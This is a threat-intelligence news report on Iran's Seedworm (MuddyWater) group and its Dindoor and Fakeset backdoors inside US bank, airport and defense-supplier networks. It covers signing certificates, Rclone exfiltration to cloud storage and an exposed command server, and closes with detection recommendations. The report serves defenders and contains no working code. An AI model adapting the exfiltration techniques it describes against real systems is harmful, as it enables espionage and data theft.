Iran’s Seedworm APT group (also known as MuddyWater) has established persistent access inside the networks of multiple US organizations since early February 2026, deploying two previously unknown malware implants as geopolitical tensions between the US and Iran escalate.
New Backdoor Arsenal: Dindoor and Fakeset
Joint research from Symantec and Carbon Black has identified Seedworm activity on the networks of:
- A US bank – financial sector targeting
- A US airport – aviation infrastructure at risk
- Non-profit organizations – expanded targeting scope
- Israeli operations of a US defense/aerospace software company – supply chain infiltration
The group deployed two novel backdoors:
Dindoor – A sophisticated backdoor leveraging Deno, a runtime environment for JavaScript and TypeScript, to execute commands on infected machines. Dindoor was digitally signed with a certificate issued to an individual named “Amy Cherne.”
Fakeset – A Python-based backdoor also signed using certificates attributed to “Amy Cherne” and “Donald Gay.” The “Donald Gay” certificate has previously been associated with Stagecomp and Darkcomp malware used by Seedworm.
Attribution: Iran’s Ministry of Intelligence
Seedworm has been linked to Iran’s Ministry of Intelligence and Security (MOIS) and is known for espionage campaigns targeting government agencies, telecommunications companies, and critical infrastructure globally. The group’s focus on US and Israeli targets amid the current conflict positions them dangerously for potential follow-on attacks.
Researchers observed attackers using Rclone, an open-source file synchronization tool, to exfiltrate data from the compromised software company to Wasabi cloud storage – a clear indicator of espionage objectives.
Exposed VPS Reveals Broader Operation
In a related development, independent threat-intel research collective Ctrl-Alt-Intel accessed Seedworm infrastructure hosted in the Netherlands, harvesting C2 tooling, scripts, logs, and victim data. Their analysis revealed additional targets including:
- Israeli organizations (healthcare, hosting, immigration, intelligence)
- EgyptAir
- Jordanian government entities
- Various UAE companies
- US entities
- Jewish/Israeli-linked NGOs
The exposed infrastructure showed exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage and EC2 instances.
Why This Matters
With Iranian cyber operations potentially accelerating alongside the broader Middle East conflict, Seedworm’s pre-established network presence in US critical infrastructure represents a significant threat. The group demonstrates continuous evolution of custom tooling while rapidly adopting public exploit code – a dangerous combination for defenders.
Critical Recommendations:
- Hunt for Deno-based processes and unusual JavaScript/TypeScript execution
- Monitor for Rclone and cloud storage exfiltration patterns
- Audit certificate-signed executables, particularly those using “Amy Cherne” or “Donald Gay” certificates
- Review network traffic to Wasabi cloud storage
- Implement enhanced monitoring for defense and aerospace supply chain partners
Source: Help Net Security
